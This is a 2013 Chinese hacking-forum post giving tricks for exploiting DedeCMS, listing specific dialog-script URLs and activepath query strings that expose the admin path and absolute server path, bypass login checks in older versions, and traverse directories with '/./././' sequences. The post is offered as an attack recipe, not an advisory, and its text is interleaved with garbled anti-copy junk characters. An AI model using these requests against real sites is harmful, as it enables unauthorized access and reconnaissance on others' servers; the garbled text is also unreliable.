找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2101|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理7 B2 W. O% m7 M5 p* G

2 I& a6 E2 d- V7 _员帐号,新版本的就直接转向了后台.$ J$ s" h, o/ T( D' _# u; v6 r
+ ~% V0 v$ U' a
2.include/dialog/config.php会爆出后台管理路径
0 c* o+ W9 i) f. P* Q, [# f
9 S. |* _' U. V& v' J" h3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录, L. ]3 |5 N! ]6 e+ F3 J% S
  a: \7 l# d3 U! x( E9 z( o
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
: u* B1 F* e+ O" r  \/ A8 D& ?4 i( K% }/ p* R
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉! }' M0 M8 e. E4 `1 Z
4 J; X7 Q3 C5 {. l6 U5 S5 u. G* a
到根目录去.不过这些版本的访问地址有些不同.
- _4 V/ f2 `. q. F2 T% u地址为require/dialog/select_soft.php?activepath=/././././././././: J, p- E* R8 z; M
- M5 m" V' f3 Y' i
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
; D6 g) \% @" s) D, K$ ^5 m5 V4 \$ u存在相同问题的文件还有/ ~' Q+ `& }' l5 x8 A8 R( X
include\dialog\select_images.php
1 o. i" H8 o; F* h: _& B6 Ainclude\dialog\select_media.php
4 y3 @2 m; w2 H) i" ainclude\dialog\select_templets.php​/ l5 a# ~% _4 `  m4 ]4 a
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表